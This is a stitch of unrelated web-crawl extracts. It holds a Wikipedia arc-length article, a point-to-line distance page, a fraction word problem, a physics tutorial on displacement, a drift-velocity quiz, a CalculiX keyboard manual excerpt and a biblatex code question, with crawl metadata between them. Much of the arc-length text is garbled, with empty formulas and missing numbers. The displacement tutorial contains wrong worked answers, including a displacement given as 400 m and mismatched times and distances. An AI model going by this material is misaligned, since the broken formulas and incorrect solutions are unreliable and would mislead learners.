Let $\mathbf\left(u,v\right)$ be a surface mapping and let $\mathbf\left(t\right) = \left(u\left(t\right), v\left(t\right)\right)$ be a curve on this surface. The integrand of the arc length integral is $|\left(\mathbf\circ\mathbf\right)\text{'}\left(t\right)|.$ Evaluating the derivative requires the chain rule for vector fields: : $D\left(\mathbf \circ \mathbf\right) = \left(\mathbf_u \ \mathbf_v\right)\binom = \mathbf_u u\text{'} + \mathbf_v v\text{'}.$ The squared norm of this vector is $\left(\mathbf_u u\text{'} + \mathbf_v v\text{'}\right) \cdot \left(\mathbf_u u\text{'} + \mathbf_v v\text{'}\right) = g_\left(u\text{'}\right)^2 + 2g_u\text{'}v\text{'} + g_\left(v\text{'}\right)^2$ (where $g_$ is the first fundamental form coefficient), so the integrand of the arc length integral can be written as $\sqrt$ (where $u^1 = u$ and $u^2 = v$).
Other coordinate systems
Let $\mathbf\left(t\right) = \left(r\left(t\right), \theta\left(t\right)\right)$ be a curve expressed in polar coordinates. The mapping that transforms from polar coordinates to rectangular coordinates is :$\mathbf\left(r,\theta\right) = \left(r\cos\theta, r\sin\theta \right).$ The integrand of the arc length integral is $|\left(\mathbf\circ\mathbf\right)\text{'}\left(t\right)|.$ The chain rule for vector fields shows that $D\left(\mathbf\circ \mathbf\right) = \mathbf_r r\text{'} + \mathbf_ \theta\text{'}.$ So the squared integrand of the arc length integral is :$\left(\mathbf\cdot\mathbf\right)\left(r\text{'}\right)^2 + 2\left(\mathbf_r\cdot\mathbf_\right)r\text{'}\theta\text{'} + \left(\mathbf_\cdot\mathbf_\right)\left(\theta\text{'}\right)^2 = \left(r\text{'}\right)^2 + r^2\left(\theta\text{'}\right)^2.$ So for a curve expressed in polar coordinates, the arc length is :$\int_^ \sqrtdt = \int_^ \sqrtd\theta.$ Now let $\mathbf\left(t\right) = \left(r\left(t\right), \theta\left(t\right), \phi\left(t\right)\right)$ be a curve expressed in spherical coordinates where $\theta$ is the polar angle measured from the positive $z$-axis and $\phi$ is the azimuthal angle. The mapping that transforms from spherical coordinates to rectangular coordinates is :$\mathbf\left(r,\theta,\phi\right) = \left(r\sin\theta\cos\phi, r\sin\theta\sin\phi, r\cos\theta\right).$ Using the chain rule again shows that $D\left(\mathbf\circ\mathbf\right) = \mathbf_r r\text{'} + \mathbf_\theta\text{'} + \mathbf_\phi\text{'}.$ All dot products $\mathbf_i \cdot \mathbf_j$ where $i$ and $j$ differ are zero, so the squared norm of this vector is :$\left(\mathbf_r\cdot \mathbf_r \right)\left(r\text{'}^2\right) + \left(\mathbf_ \cdot \mathbf_\right)\left(\theta\text{'}\right)^2 + \left(\mathbf_\cdot \mathbf_\right)\left(\phi\text{'}\right)^2 = \left(r\text{'}\right)^2 + r^2\left(\theta\text{'}\right)^2 + r^2 \sin^2\theta \left(\phi\text{'}\right)^2.$ So for a curve expressed in spherical coordinates, the arc length is :$\int_^ \sqrtdt.$ A very similar calculation shows that the arc length of a curve expressed in cylindrical coordinates is :$\int_^ \sqrtdt.$
Simple cases
Arcs of circles
Arc lengths are denoted by ''s'', since the Latin word for length (or size) is ''spatium''. In the following lines, $r$ represents the radius of a circle, $d$ is its diameter, $C$ is its circumference, $s$ is the length of an arc of the circle, and $\theta$ is the angle which the arc subtends at the centre of the circle. The distances $r, d, C,$ and $s$ are expressed in the same units. * $C=2\pi r,$ which is the same as $C=\pi d.$ This equation is a definition of $\pi.$ * If the arc is a semicircle, then $s=\pi r.$ * For an arbitrary circular arc: ** If $\theta$ is in radians then $s =r\theta.$ This is a definition of the radian. ** If $\theta$ is in degrees, then $s=\frac,$ which is the same as $s=\frac.$ ** If $\theta$ is in grads (100 grads, or grades, or gradians are one right-angle), then $s=\frac,$ which is the same as $s=\frac.$ ** If $\theta$ is in turns (one turn is a complete rotation, or 360°, or 400 grads, or $2\pi$ radians), then $s=C \theta/\text$.
Arcs of great circles on the Earth
Two units of length, the nautical mile and the metre (or kilometre), were originally defined so the lengths of arcs of great circles on the Earth's surface would be simply numerically related to the angles they subtend at its centre. The simple equation $s=\theta$ applies in the following circumstances: :* if $s$ is in nautical miles, and $\theta$ is in arcminutes ( degree), or :* if $s$ is in kilometres, and $\theta$ is in centigrades ( grad). The lengths of the distance units were chosen to make the circumference of the Earth equal kilometres, or nautical miles. Those are the numbers of the corresponding angle units in one complete turn. Those definitions of the metre and the nautical mile have been superseded by more precise ones, but the original definitions are still accurate enough for conceptual purposes and some calculations. For example, they imply that one kilometre is exactly 0.54 nautical miles. Using official modern definitions, one nautical mile is exactly 1.852 kilometres, which implies that 1 kilometre is about nautical miles. This modern ratio differs from the one calculated from the original definitions by less than one part in 10,000.
Length of an arc of a parabola
Historical methods
Antiquity
For much of the history of mathematics, even the greatest thinkers considered it impossible to compute the length of an irregular arc. Although Archimedes had pioneered a way of finding the area beneath a curve with his "method of exhaustion", few believed it was even possible for curves to have definite lengths, as do straight lines. The first ground was broken in this field, as it often has been in calculus, by approximation. People began to inscribe polygons within the curves and compute the length of the sides for a somewhat accurate measurement of the length. By using more segments, and by decreasing the length of each segment, they were able to obtain a more and more accurate approximation. In particular, by inscribing a polygon of many sides in a circle, they were able to find approximate values of π.
17th century
In the 17th century, the method of exhaustion led to the rectification by geometrical methods of several transcendental curves: the logarithmic spiral by Evangelista Torricelli in 1645 (some sources say John Wallis in the 1650s), the cycloid by Christopher Wren in 1658, and the catenary by Gottfried Leibniz in 1691. In 1659, Wallis credited William Neile's discovery of the first rectification of a nontrivial algebraic curve, the semicubical parabola. The accompanying figures appear on page 145. On page 91, William Neile is mentioned as ''Gulielmus Nelius''.
Integral form
Before the full formal development of calculus, the basis for the modern integral form for arc length was independently discovered by Hendrik van Heuraet and Pierre de Fermat. In 1659 van Heuraet published a construction showing that the problem of determining arc length could be transformed into the problem of determining the area under a curve (i.e., an integral). As an example of his method, he determined the arc length of a semicubical parabola, which required finding the area under a parabola. In 1660, Fermat published a more general theory containing the same result in his ''De linearum curvarum cum lineis rectis comparatione dissertatio geometrica'' (Geometric dissertation on curved lines in comparison with straight lines). Building on his previous work with tangents, Fermat used the curve :$y = x^ \,$ whose tangent at ''x'' = ''a'' had a slope of :$\textstyle a^$ so the tangent line would have the equation :$y = \textstyle \left(x - a\right) + f\left(a\right).$ Next, he increased ''a'' by a small amount to ''a'' + ''ε'', making segment ''AC'' a relatively good approximation for the length of the curve from ''A'' to ''D''. To find the length of the segment ''AC'', he used the Pythagorean theorem: : $\begin AC^2 &= AB^2 + BC^2 \\ & = \textstyle \varepsilon^2 + a \varepsilon^2 \\ &= \textstyle \varepsilon^2 \left \left(1 + a \right \right) \end$ which, when solved, yields :$AC = \textstyle \varepsilon \sqrt .$ In order to approximate the length, Fermat would sum up a sequence of short segments.
Curves with infinite length
As mentioned above, some curves are non-rectifiable. That is, there is no upper bound on the lengths of polygonal approximations; the length can be made arbitrarily large. Informally, such curves are said to have infinite length. There are continuous curves on which every arc (other than a single-point arc) has infinite length. An example of such a curve is the Koch curve. Another example of a curve with infinite length is the graph of the function defined by ''f''(''x'') = ''x'' sin(1/''x'') for any open set with 0 as one of its delimiters and ''f''(0) = 0. Sometimes the Hausdorff dimension and Hausdorff measure are used to quantify the size of such curves.
Generalization to (pseudo-)Riemannian manifolds
Let $M$ be a (pseudo-)Riemannian manifold, $\gamma:,1rightarrow M$ a curve in $M$ and $g$ the (pseudo-) metric tensor. The length of $\gamma$ is defined to be :$\ell\left(\gamma\right)=\int_^ \sqrt \, dt,$ where $\gamma\text{'}\left(t\right)\in T_M$ is the tangent vector of $\gamma$ at $t.$ The sign in the square root is chosen once for a given curve, to ensure that the square root is a real number. The positive sign is chosen for spacelike curves; in a pseudo-Riemannian manifold, the negative sign may be chosen for timelike curves. Thus the length of a curve is a non-negative real number. Usually no curves are considered which are partly spacelike and partly timelike. In theory of relativity, arc length of timelike curves (world lines) is the proper time elapsed along the world line, and arc length of a spacelike curve the proper distance along the curve.
See also
* Arc (geometry) * Circumference * Crofton formula * Elliptic integral * Geodesics * Intrinsic equation * Integral approximations * Line integral * Meridian arc * Multivariable calculus * Sinuosity
References
Sources
*
External links
*
*
Arc Length
by Ed Pegg Jr., The Wolfram Demonstrations Project, 2007.
Calculus Study Guide – Arc Length (Rectification)
''The MacTutor History of Mathematics archive''
Arc Length Approximation
by Chad Pierson, Josh Fritz, and Angela Sharp, The Wolfram Demonstrations Project.
Length of a Curve Experiment
Illustrates numerical solution of finding length of a curve. {{Authority control Category:Integral calculus Category:Curves Category:Length Category:One-dimensional coordinate systems | 2021-09-26 12:13:48 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 107, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9367987513542175, "perplexity": 335.77252571993887}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057861.0/warc/CC-MAIN-20210926114012-20210926144012-00527.warc.gz"} |
http://en.wikipedia.org/wiki/Distance_from_a_point_to_a_line | Distance from a point to a line
>
The distance from a point to a line is the shortest distance from a point to a line in Euclidean geometry. The distance from a point to a line will always turn out to be a perpendicular line. It can be calculated in the following ways. Knowing the shortest distance from a point to a line can be useful in a few situations. For example, The shortest distance to reach a road, quantifying the scatter on a graph, etc.
Cartesian coordinates
In the case of a line in the plane given by the equation ax + by + c = 0, where a, b and c are real constants with a and b not both zero, the distance from the line to a point (x0,y0) is[1]
$\operatorname{distance}(ax+by+c=0, (x_0, y_0)) = \frac{|ax_0+by_0+c|}{\sqrt{a^2+b^2}}.$
[2]
Vector formulation
Illustration of the vector formulation.
Suppose we express the line in vector form:
$\mathbf{x} = \mathbf{a} + t\mathbf{n}$
where n is a unit vector. That is, a point, x, on the line is found by moving to a point a in space, then moving t units along the direction of the line.
The distance of an arbitrary point p to this line is given by
$\operatorname{distance}(\mathbf{x} = \mathbf{a} + t\mathbf{n}, \mathbf{p}) = \| (\mathbf{a}-\mathbf{p}) - ((\mathbf{a}-\mathbf{p}) \cdot \mathbf{n})\mathbf{n} \|.$
This more general formula can be used in dimensions other than two. This equation is constructed geometrically as follows: $\mathbf{a}-\mathbf{p}$ is a vector from p to the point a on the line. Then $(\mathbf{a} - \mathbf{p}) \cdot \mathbf{n}$ is the projected length onto the line and so
$((\mathbf{a} - \mathbf{p}) \cdot \mathbf{n})\mathbf{n}$
is a vector that is the projection of $\mathbf{a}-\mathbf{p}$ onto the line and so
$(\mathbf{a}-\mathbf{p}) - ((\mathbf{a}-\mathbf{p}) \cdot \mathbf{n})\mathbf{n}$
is the component of $\mathbf{a}-\mathbf{p}$ perpendicular to the line. The distance from the point to the line is then just the norm of that vector. [3]
Proof 1 (algebraic proof)
Let point (x,y) be the intersection between the line ax + by + c = 0 and the line perpendicular to ax+by+c = 0 passing through the arbitrary point (m,n).
Then it is necessary to show $a^2(n-y)^2 + b^2(m-x)^2 =2ab(m-x)(n-y).$
The above equation can be changed to $\frac{(a^2(n-y))}{(m-x)} = \frac{(b^2(m-x))}{(n-y)}$ because the slope of the line perpendicular to the line ax+by+c which contains (x,y) and (m,n) is b/a.
Then
$(a^2+b^2)((m-x)^2+(n-y)^2)=[a(m-x)+b(n-y)]^2=(am+bn+c)^2.$
So the distance is
$d=\sqrt{(m-x)^2+(n-y)^2}= \frac{|am+bn+c|}{\sqrt{a^2+b^2}}.$
[4]
Proof 2 (geometric proof)
Let the point S(m,n) connect to the point G(x,y) which is on the line ax+by+c=0, both lines being perpendicular to each other.
Draw a line am+bn+d=0, containing the point S(m,n), which is parallel to ax+by+c=0.
The absolute value of (c-d)/b, which is the distance of the line connecting the point G and some point F on the line am+bn+d=0 and parallel to the y-axis, is equal to the absolute value of (am+bn+c)/b.
Then the desired distance SG can be derived from the right triangle SGF, which is in the ratio of a:b:$\sqrt{a^2+b^2}$.
The absolute value of (am+bn+c)/b is the diagonal of the right triangle, so just multiply by the absolute value of b and divide by $\sqrt{a^2+b^2}$, and the proof is complete.
Another possible equation
By using the above Vector Formulation, it is possible to extract an equation to find the smallest distance of a point to a line. This can be found by deriving and substituting the following equations:
The Point P is given where $P_x$ and $P_y$ represent the x and y coordinates of the point P respectively. The equation of a line is given $y=mx+c$. The equation of the normal of that line which passes through the point P is given $y=\frac{P_x-x}{m}+P_y$.
The point at which these two lines intersect is the closest point on the original line to the point P. Hence:
$mx+c=\frac{P_x-x}{m}+P_y$
By rearranging, we can find the value of x at which they intersect.
$x=\frac{P_x+mP_y-mc}{m^2+1}$
The y coordinate can therefore be found by substituting the value of X into the equation of the original line.
$y=m\frac{(P_x+mP_y-mc)}{m^2+1}+c$
By using the equation for finding the geometric distance between 2 points $d=\sqrt{(X_2-X_1)^2+(Y_2-Y_1)^2}$, we can deduce the formula to find the shortest distance between a line and a point is the following:
$d=\sqrt{ \left( {\frac{P_x+mP_y-mc}{m^2+1}-P_x } \right) ^2 + \left( {m\frac{P_x+mP_y-mc}{m^2+1}+c-P_y }\right) ^2 }$
Note: If the line is perpendicular to the x-axis, one should use $m=0$, and swap $P_x$ and $P_y$.
Garner gives another proof and equation for the Cartesian Coordinate method here.[5] | 2013-12-12 05:17:20 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 27, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.758379340171814, "perplexity": 137.55209905062424}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-48/segments/1386164491055/warc/CC-MAIN-20131204134131-00049-ip-10-33-133-15.ec2.internal.warc.gz"} |
https://www.hackmath.net/en/math-problem/10571?tag_id=35 | # Video game
Nicole is playing a video game where each round lasts 7/12 of an hour. She has scheduled 3 3/4 hours to play the game. How many rounds can Nicole play?
Result
n = 6
#### Solution:
$t_{ 1 } = \dfrac{ 7 }{ 12 } \doteq 0.5833 \ h \ \\ t_{ 2 } = 3 + \dfrac{ 3 }{ 4 } = \dfrac{ 15 }{ 4 } = 3.75 \ h \ \\ \ \\ N = t_{ 2 }/t_{ 1 } = 3.75/0.5833 = \dfrac{ 45 }{ 7 } \doteq 6.4286 \ \\ \ \\ n = \lfloor N \rfloor = \lfloor 6.4286 \rfloor = 6$
Leave us a comment of this math problem and its solution (i.e. if it is still somewhat unclear...):
Be the first to comment!
#### Following knowledge from mathematics are needed to solve this word math problem:
Need help calculate sum, simplify or multiply fractions? Try our fraction calculator.
## Next similar math problems:
1. Movement
From the crossing of two perpendicular roads started two cyclists (each at different road). One runs at average speed 28 km/h, the second at average speed 24 km/h. Determine the distance between them after 45 minutes cycling.
2. Theater
The theater has in each row with 19 seats. Ticket to the first 10 rows is for 30 USD. In next rows is for 15 USD. The theater was completely sold out. Revenue was 12255 USD. How many rows are in the theater?
3. Time
Write time in minutes rounded to one decimal place: 5 h 28 m 26 s.
4. Rate or interest
At what rate percent will Rs.2000 amount to Rs.2315.25 in 3 years at compound interest?
5. Precious metals
In 2006-2009, the value of precious metals changed rapidly. The data in the following table represent the total rate of return (in percentage) for platinum, gold, an silver from 2006 through 2009: Year Platinum Gold Silver 2009 62.7 25.0 56.8 2008 -41.3 4
6. Hens
11 hens will eat spilled grain from 6AM to 16 PM. At 11 hour grandmother brought 4 hens from the neighbors. At what time was grain out?
7. Root
The root of the equation ? is: ?
8. Evaluate - order of ops
Evaluate the expression: 32+2[5×(24-6)]-48÷24 Pay attention to the order of operation including integers
9. Short cut
Imagine that you are going to the friend. That path has a length 330 meters. Then turn left and go another 2000 meters and you are at a friend's. The question is how much the journey will be shorter if you go direct across the field?
10. Prism X
The prism with the edges of the lengths x cm, 2x cm and 3x cm has volume 20250 cm3. What is the area of surface of the prism?
11. Balls
Three metal balls with volumes V1=71 cm3 V2=78 cm3 and V3=64 cm3 melted into one ball. Determine it's surface area.
12. Grower
Grower harvested 190 kg of apples. Pears harvested 10 times less. a) How many kg pears harvested? b) How many apples and pears harvested? c) How many kg harvested pears less than apples?
13. Cube 6
Volume of the cube is 216 cm3, calculate its surface area. | 2019-12-10 00:13:20 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 1, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5112653970718384, "perplexity": 3554.77213825832}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540525598.55/warc/CC-MAIN-20191209225803-20191210013803-00129.warc.gz"} |
https://physics.tutorvista.com/motion/displacement.html | Top
# Displacement
In physics, mechanics includes the study of the object’s motion. Kinematics is the branch of mechanics science that describes the motion of objects with the use of some terms, diagrams, graphs, numbers, and equations. These are also described by mathematical quantities which are used for determining the motion of objects. These are divided into two types that are a vector or a scalar which can be distinguished by their particular definitions which shows that Scalars quantities are easily represented by a magnitude or their numerical value while vectors quantities are described by use of both a magnitude and a direction.
Some examples of these quantities are acceleration, distance, speed, displacement, velocity etc. If we discuss distance and displacement are two quantities out of which distance is scalar quantity while displacement is vector quantity which shows the change in position of object but the distance shows the covered length by moving object. When we travel from one location to other location for reach fast on the destination, we take shortcuts making distance less so we prefer straight path over curved path. So these two quantities are related to the motion of object. Here we discuss all about the displacement.
Related Calculators Displacement Calculator
## Displacement Definition
Displacement is that what tells about the change in position. It is a vector and is the overall change in the position from the reference point. It is the shortest distance between the initial point and the final point. It prefers straight line path over curved path and is a vector quantity.
From these definitions, it is not yet clear what the difference between the distance and the displacement is? For understanding the difference between these quantities we must look at the following example.
Example:
A person has walked as follows (i) For the first 10 seconds, he walked to the north for 100 meters. (ii) For the next 30 seconds, he turns west and walks for 200 meters. (iii) For the next 10 seconds, he turns north and walks for 300 meters. (iv) Find the distance and displacement of the person from its original place.
Solution: As we know that the distance is total ground the person has traveled, so the distance is given by Distance = 100 + 200 + 300 = 600 meters. But the displacement is given by Displacement = 100 + 300 = 400 meters.
To understand it, we need to look at the picture below:
From the figure, if we want to find the displacement, it is the overall distance from the initial point (a) to the final point (B), which is 400 meters only, i.e. the direct distance between A and B.
From this example, we can conclude that displacement is the shortest distance between two points.
## Formula
There is no single formula for displacement, it depends on the other quantities present in the problem. Still, there are a few formulae using which we can find the displacement.
S = vt
S = ut + $\frac{1}{2}$at2
where u and v are initial and final velocity and a is acceleration.
## Distance vs Displacement
• The Distance as already discussed is the scalar quantity and it is the total path or actual path covered by the object between initial and the final point.The displacement is the shortest path between two points and it is the vector quantity.
• Both are measured in unit of lengths. Distance is generally associated with the speed of the body while displacement with the velocity of the body.
• The distance is also said to be the magnitude of displacement.
## Angular Displacement
When an object is moving in a circular or curved path, its displacement is measured as the change of angle from its initial position to the final position. This displacement is known as angular displacement. It is measured in radians.
The angular displacement is given by $\theta$ where $\theta$ is the angle between initial and final position of the object moving in Curved path.
The relation between linear displacement and angular displacement is
S = r $\theta$
where, r = radius of the curve along which object is moving
## Displacement Vector
Let us consider the motion of an object from point A to B as shown in fig.
The Actual distance covered by the object is shown by the thick line, while the light line denotes the displacement and is known as displacement vector from point A to point B.
## Resultant Displacement
The 'Resultant' term itself means the Sum or Total. So, the term Resultant displacement is the sum of all the displacements which have taken place.
## Can Displacement Be Negative?
From the above discussion we know that the displacement is the vector quantity, i.e., it has both magnitude and direction. If displacement is negative, it does not mean that the displacement is getting decreased, it means that the displacement is taking opposite direction. And hence the negative sign indicates that the object is moving in the opposite direction with respect to its initial position.
## Examples
### Solved Examples
Question 1: A car is moving with a uniform velocity of 10 m/sec. It travels to east, starting from point A, for 30 seconds, and then it turns left and moves for another 40 seconds. Find its resultant displacement?
Solution:
While traveling to the east it covered a distance of 300 meters (10 $\times$ 30 = 300) and when it turns left it is moving in north direction for another 30 seconds so the distance it covers in north direction is 200 meters (10 $\times$ 40 = 400). The figure of this motion is as shown:
We know that the displacement is the Shortest distance between two points,
Since the figure is Right angled triangle, the resultant displacement will be,
AB = $\sqrt{AO^{2} + OB^{2}}$
= $\sqrt{300^{2} + 400^{2}}$
= 500 m.
Question 2: A man is walking from his office to home. He exits the office and walks 400 m west. He then turns and walks 700 m north. Determine the magnitude and direction of his resultant displacement?
Solution:
His resultant displacement is given by :
S = $\sqrt{400^{2}+700^{2}}$
S = $\sqrt{160000 + 490000}$
S = $\sqrt{650000}$
S = 806.23 meters.
Although his total distance traveled is 1100 meters but his resultant displacement is 806.23 meters in North – West direction.
Question 3: A bus is heading city B from city A via city C. The bus started from city A and moved towards city C in south direction at the distance of 100 km. It then turns left and moves for another 200 km before reaching the city B. Find the total distance traveled by the bus and the magnitude and resultant of the displacement of the bus from the city A?
Solution:
1. Total distance traveled by the bus is D = 100 + 200 = 300 km.
2. Magnitude of the displacement is,
|S| = $\sqrt{100^{2} + 200^{2}}$,
= $\sqrt {50000}$,
|S| = 223.61 kms.
3. Direction of the resultant displacement is, the bus travels first to south and then turns left so it turns in west and hence the resultant direction from the city A is south – west.
Question 4: A boy is walking for his school and he started traveling opposite to his house, which is situated in the north direction. He traveled opposite to his house for 100 meters and then turns right and travels for 200 meters and again turns right and travels for 50 meters. Find the total distance covered by him and the magnitude and the direction of the displacement?
Solution:
1. Total distance covered by him is: 100 + 200 + 50 = 350 meters.
2. Magnitude of the displacement can be obtained by visualizing his walking,
Fig – 4
The distance from A to B is 100 meters,
from B to C is 200 meters and from C to D is 50 meters.
So, the magnitude of resultant displacement is,
|S| = $\sqrt{50^{2} + 200^{2}}$
= $\sqrt{42500}$
|S| = 206.155 m.
3. The direction of the resultant displacement is South–West.
More topics in Displacement Angular Displacement
Related Topics Physics Help Physics Tutor
*AP and SAT are registered trademarks of the College Board. | 2019-04-24 22:33:49 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6929992437362671, "perplexity": 388.07897369143603}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578663470.91/warc/CC-MAIN-20190424214335-20190425000335-00503.warc.gz"} |
https://testbook.com/question-answer/the-drift-velocity-of-electrons-in-a-current-carry--5fa2935d32bf8660e0630ced | # The drift velocity of electrons in a current-carrying wire of cross-sectional area A and current I is v. If the electric current and the cross-sectional area is doubled then-new drift velocity will-
This question was previously asked in
Airforce Group X 4 November 2020 Memory Based Paper
View all Airforce Group X Papers >
1. become 2 times
2. become 4 times
3. become half
4. remain same
## Answer (Detailed Solution Below)
Option 4 : remain same
Free
Group X 2021 Full Mock Test
80603
70 Questions 70 Marks 60 Mins
## Detailed Solution
The correct option is 4
CONCEPT
Drift velocity: In a material, The average velocity attained by charged particles due to an electric field is called drift velocity.
Drift velocity of the electrons is calculated by:
$$\Rightarrow v_d=\frac{I}{neA}$$
Where I = current in the wire, n = number density of free electrons in the wire, A = cross-sectional area of the wire, and e = charge on one electron
CALCULATION:
Drift velocity of electrons in a current-carrying wire of cross-sectional area A and current I is
$$\Rightarrow v=\frac{I}{neA}$$
Drift velocity of the electron, when electric current and the cross-sectional area is doubled is
$$\Rightarrow v'=\frac{I'}{neA'}=\frac{2I}{2neA}=v$$
$$[\because v=\frac{I}{neA}]$$
Therefore the new drift velocity will remain the same. Hence option 4 is correct. | 2021-10-25 08:36:40 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6117103099822998, "perplexity": 2028.477272885571}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587655.10/warc/CC-MAIN-20211025061300-20211025091300-00288.warc.gz"} |
https://www.openaircraft.com/ccx-doc/cgx/node9.html | ## Keyboard
The Keyboard is used for command line input and specifying the type of entities when selecting them with the mouse pointer. The command line is preferable in situations where pure mouse operation is not convenient (i.e. to define a certain value) or for batch controlled operations. Therefore most commands are only available over the command line. The stream coming from the keyboard is echoed in the parent-konsole but during typing the mouse pointer must stay inside the main window. Otherwise the commands will not be recognized by the program. The user might use the menu fuction “Toggle CommandLine” or the command “view cl” to switch the command line from the konsole to the graphic's window.
The following special keys are used:
Special Keys:
ARROW_UP: previous command
ARROW_DOWN: next command
PAGE_UP: entities of previous set (if the last command was
plot or plus) or the previous Loadcase
PAGE_DOWN: entities of next set (if the last command was
plot or plus) or the next Loadcase | 2022-10-04 21:08:45 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.29250428080558777, "perplexity": 3216.4024656486868}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00670.warc.gz"} |
https://tex.stackexchange.com/questions/483707/how-to-detect-whether-the-option-citecounter-was-enabled-on-biblatex | How to detect whether the option citecounter was enabled on biblatex?
I think this is the definition of the citecounter option on the biblatex package:
\DeclareBibliographyOption[boolean]{citecounter}[true]{%
\ifcsdef{blx@opt@citecounter@#1}
{\csuse{blx@opt@citecounter@#1}}
{\blx@err@invopt{citecounter=#1}{}}}
\def\blx@opt@citecounter@true{%
\let\blx@setcitecounter\blx@setcitecounter@global
\let\blx@citecounter\blx@citecounter@global
\let\abx@aux@count\blx@aux@count
\let\abx@aux@fncount\blx@aux@fncount
\booltrue{citetracker}}
\def\blx@opt@citecounter@context{%
\let\blx@setcitecounter\blx@setcitecounter@context
\let\blx@citecounter\blx@citecounter@context
\let\abx@aux@count\blx@aux@count
\let\abx@aux@fncount\blx@aux@fncount
\booltrue{citetracker}}
\def\blx@opt@citecounter@false{%
\let\blx@setcitecounter\relax
\let\blx@citecounter\relax
